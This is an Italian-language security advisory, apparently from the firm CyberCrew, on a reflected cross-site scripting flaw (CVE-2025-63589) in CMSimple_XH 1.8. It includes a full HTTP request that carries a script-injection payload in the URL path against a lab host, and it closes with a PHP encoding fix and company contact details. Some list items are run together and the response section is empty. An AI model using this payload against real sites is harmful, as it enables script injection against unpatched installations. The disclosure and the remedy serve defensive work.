
Proof-of-concept di XSS riflesso per CMSimple_XH 1.8 con injection di script non autenticata tramite segmenti di percorso non sanificati, inclusi punteggio CVSS 6.1 ed esempio di rimedio PHP.
Scoperto: 6 ottobre 2025
Prodotti: CMSimple_XH (CMS open-source flat-file)
Versioni interessate: 1.8
CVE: CVE-2025-63589
Autenticazione richiesta: Nessuna (senza autenticazione)
Tipo di attacco: Cross-Site Scripting riflesso (XSS)
CVSS v3.1 stimato: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio)
Il front-controller in index.php accetta segmenti di percorso dinamici (usati per instradare verso template/pagine) e passa questi valori al rendering dei template. Il codice non sanifica né codifica in HTML in modo adeguato questi segmenti di percorso prima di inserirli negli attributi e negli href degli anchor. Di conseguenza, un URI di richiesta appositamente costruito contenente caratteri come "> e tag iniettati (es. <script>...</script>) viene riflesso verbatim nell'output HTML ed eseguito dal browser.
I punti di riflessione tipici includono:
action dei form (es. moduli di login/ricerca)href delle voci di navigazione/menu<nav class="locator">)Print view, Sitemap, Login, ecc.)Poiché l'input finisce all'interno di contesti di attributi HTML e nel contenuto degli anchor, è necessaria una codifica standard degli attributi, che però manca.
Richiesta:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

Risposta:


Il payload iniettato gjtqw"><script>alert(1)</script>co2cu viene riflesso senza codifica nei link di menu, nei breadcrumb, nell'action del form di ricerca e nei link a piè di pagina, con conseguente esecuzione dello script al rendering della pagina.
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)Per domande o richieste, non esitate a contattarci.

📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| Campo | Contenuto |
|---|---|
| Nome azienda | 株式会社CyberCrew |
| Sede | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
Analizziamo le vulnerabilità dell'organizzazione da più prospettive e proponiamo le soluzioni di miglioramento ottimali.
Supportiamo test mirati, basati su scenari e LLM pentest.
Rileviamo tempestivamente la fuoriuscita di informazioni riservate e interveniamo rapidamente.
Eseguiamo valutazioni della capacità difensiva basate su scenari di attacco realistici.
Supportiamo una progettazione che considera la sicurezza fin dalle fasi iniziali dello sviluppo.
🌐 Sito ufficiale:https://www.cybercrew.co.jp
🕒 CyberCrew — Il tuo partner di fiducia per la sicurezza.